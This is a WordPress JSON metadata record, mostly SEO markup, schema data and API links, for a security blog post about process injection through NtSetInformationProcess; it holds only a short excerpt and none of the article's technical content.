These techniques are interesting because the malicious payload is executed by a legitimate process&#8230;<\/p>\n","protected":false},"author":1453,"featured_media":20951,"comment_status":"open","ping_status":"closed","sticky":true,"template":"page-templates\/tmpl-one.php","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2777,3922,3273],"tags":[],"coauthors":[4210],"class_list":["post-21481","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity-digital-trust","category-deep-dive-en","category-ethical-hacking-indicent-response-en"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Process Injection using NtSetInformationProcess - RiskInsight<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Process Injection using NtSetInformationProcess - RiskInsight\" \/>\n<meta property=\"og:description\" content=\"Process injection is a family of malware development techniques allowing an attacker to execute a malicious payload into legitimate addressable memory space of a legitimate process. 
These techniques are interesting because the malicious payload is executed by a legitimate process...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\" \/>\n<meta property=\"og:site_name\" content=\"RiskInsight\" \/>\n<meta property=\"article:published_time\" content=\"2023-10-02T09:19:04+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-10T14:12:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"853\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Yoann DEQUEKER\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Yoann DEQUEKER\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\"},\"author\":{\"name\":\"Yoann DEQUEKER\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/4d873dfbd34bf516c111d70f13642c7c\"},\"headline\":\"Process Injection using NtSetInformationProcess\",\"datePublished\":\"2023-10-02T09:19:04+00:00\",\"dateModified\":\"2023-10-10T14:12:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\"},\"wordCount\":1576,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg\",\"articleSection\":[\"Cybersecurity &amp; Digital Trust\",\"Deep-dive\",\"Ethical Hacking &amp; Incident Response\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\",\"name\":\"Process Injection using NtSetInformationProcess - 
RiskInsight\",\"isPartOf\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg\",\"datePublished\":\"2023-10-02T09:19:04+00:00\",\"dateModified\":\"2023-10-10T14:12:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg\",\"contentUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg\",\"width\":1280,\"height\":853,\"caption\":\"Personnes travaillant avec des ordinateurs et du papier\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Process Injection using 
NtSetInformationProcess\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#website\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\",\"name\":\"RiskInsight\",\"description\":\"The cybersecurity &amp; digital trust blog by Wavestone&#039;s consultants\",\"publisher\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.riskinsight-wavestone.com\/en\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\",\"name\":\"Wavestone\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png\",\"contentUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png\",\"width\":50,\"height\":50,\"caption\":\"Wavestone\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/4d873dfbd34bf516c111d70f13642c7c\",\"name\":\"Yoann DEQUEKER\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/author\/yoann-dequeker\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Process Injection using NtSetInformationProcess - RiskInsight","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/","og_locale":"en_US","og_type":"article","og_title":"Process Injection using NtSetInformationProcess - RiskInsight","og_description":"Process injection is a family of malware development techniques allowing an attacker to execute a malicious payload into legitimate addressable memory space of a legitimate process. These techniques are interesting because the malicious payload is executed by a legitimate process...","og_url":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/","og_site_name":"RiskInsight","article_published_time":"2023-10-02T09:19:04+00:00","article_modified_time":"2023-10-10T14:12:31+00:00","og_image":[{"width":1280,"height":853,"url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg","type":"image\/jpeg"}],"author":"Yoann DEQUEKER","twitter_misc":{"Written by":"Yoann DEQUEKER","Est. 
reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#article","isPartOf":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/"},"author":{"name":"Yoann DEQUEKER","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/4d873dfbd34bf516c111d70f13642c7c"},"headline":"Process Injection using NtSetInformationProcess","datePublished":"2023-10-02T09:19:04+00:00","dateModified":"2023-10-10T14:12:31+00:00","mainEntityOfPage":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/"},"wordCount":1576,"commentCount":0,"publisher":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage"},"thumbnailUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg","articleSection":["Cybersecurity &amp; Digital Trust","Deep-dive","Ethical Hacking &amp; Incident Response"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/","url":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/","name":"Process Injection using NtSetInformationProcess - 
RiskInsight","isPartOf":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage"},"thumbnailUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg","datePublished":"2023-10-02T09:19:04+00:00","dateModified":"2023-10-10T14:12:31+00:00","breadcrumb":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage","url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg","contentUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg","width":1280,"height":853,"caption":"Personnes travaillant avec des ordinateurs et du papier"},{"@type":"BreadcrumbList","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.riskinsight-wavestone.com\/en\/"},{"@type":"ListItem","position":2,"name":"Process Injection using NtSetInformationProcess"}]},{"@type":"WebSite","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#website","url":"https:\/\/www.riskinsight-wavestone.com\/en\/","name":"RiskInsight","description":"The cybersecurity &amp; digital trust blog by Wavestone&#039;s 
consultants","publisher":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.riskinsight-wavestone.com\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization","name":"Wavestone","url":"https:\/\/www.riskinsight-wavestone.com\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/","url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png","contentUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png","width":50,"height":50,"caption":"Wavestone"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/4d873dfbd34bf516c111d70f13642c7c","name":"Yoann 
DEQUEKER","url":"https:\/\/www.riskinsight-wavestone.com\/en\/author\/yoann-dequeker\/"}]}},"_links":{"self":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/21481","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/users\/1453"}],"replies":[{"embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/comments?post=21481"}],"version-history":[{"count":18,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/21481\/revisions"}],"predecessor-version":[{"id":21542,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/21481\/revisions\/21542"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/media\/20951"}],"wp:attachment":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/media?parent=21481"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/categories?post=21481"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/tags?post=21481"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/coauthors?post=21481"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}